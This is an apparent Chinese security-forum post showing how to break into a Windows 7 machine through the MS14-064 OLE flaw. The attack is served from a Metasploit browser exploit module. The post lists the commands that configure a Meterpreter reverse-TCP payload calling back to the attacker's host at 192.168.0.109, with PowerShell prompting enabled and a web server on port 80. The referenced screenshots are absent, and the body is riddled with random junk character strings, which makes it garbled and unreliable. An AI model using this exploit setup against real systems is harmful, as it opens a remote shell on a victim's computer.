找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1434|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

# p0 `6 K* T0 q$ d3 A/ ^ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 1 `* T! E0 d s* M; m

5 Y% s, P4 C) q: U; V

! q* A# `$ ~; @( X1 G! l4 S 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: % ^$ B2 i9 ]8 f) m8 t0 d

) B+ |5 K2 K( r! V( L

! @! \* [) A3 H( [% t% G1 Z 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ) V6 N, C, J' V' @

" s2 }1 R1 N7 T3 v' y+ q. F5 @

/ l' q; z% p7 A- M             set AllowPowershellPrompt true 8 i0 U% k- x7 B( a1 J1 H) e

3 Z( u+ C8 k n1 S

- G& a: O: M8 l) f             Set LHOST 192.168.0.109 }" H) w7 `1 @! q; v1 o

. B9 i# I: [- A' n; ~1 G& Y' ^# s

. i. r8 u( i e1 G" O/ x             set SRVHOST 192.168.0.109 ; J# {6 {$ N9 ?

: b, p$ `1 z/ ~! V

5 }* C0 M9 v3 R' F- t, D             Set uripath share* q& ?& W) O3 N5 P9 J! H0 X3 y

* t9 U2 q7 b' y2 L, b* I+ j, \* S) Z

R' V" x6 f% y7 K0 n, p7 ?' a             Set srvport 80" b* l# \! X, |# v) |- |$ f

% m3 A0 u6 M! {* Q& {' [# ^

$ `. v9 w8 ]6 z( t$ p9 ~   & ~* @: @6 u2 O' e' ^

& t' d2 ^0 @8 D, h: t0 T

% ^2 o+ {' N. r% T  2 G) J3 e+ K" O' O

1 u' k+ N0 j7 ~$ W- l

x! P% s, a& y, V) M  $ E/ x8 e2 a. ^8 L( |# Q

* A/ i( o( W: b/ J1 i$ D

, ^3 R; U$ a+ k% h   * U% R/ q( g- b5 O

+ e( R2 a3 i9 o$ ?

" A2 q0 Y1 h- [! P9 l   5 I6 r: A8 m: E% }! `

7 l: X8 O F1 M$ B1 c8 R: e, z

4 x U% J5 c. r+ f8 I( \ 下面我们来访问本地地址如图: / [$ P; | G7 R* F5 S

3 X/ k: |" J. E1 J' F

" D2 X$ ?2 v/ U; s1 x+ ]  8 {2 L+ B7 y* ^; Q% `* ~( v

" d" T2 y% W- V" _0 S

! A0 h7 K$ l8 g0 A' }  8 q6 c/ b' w6 e

' _0 t+ Y b/ Z. k

; h, P ?7 ?. N3 Z: e3 L; h# N- } 4 f; e! [) O# _) `" H4 s! i

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表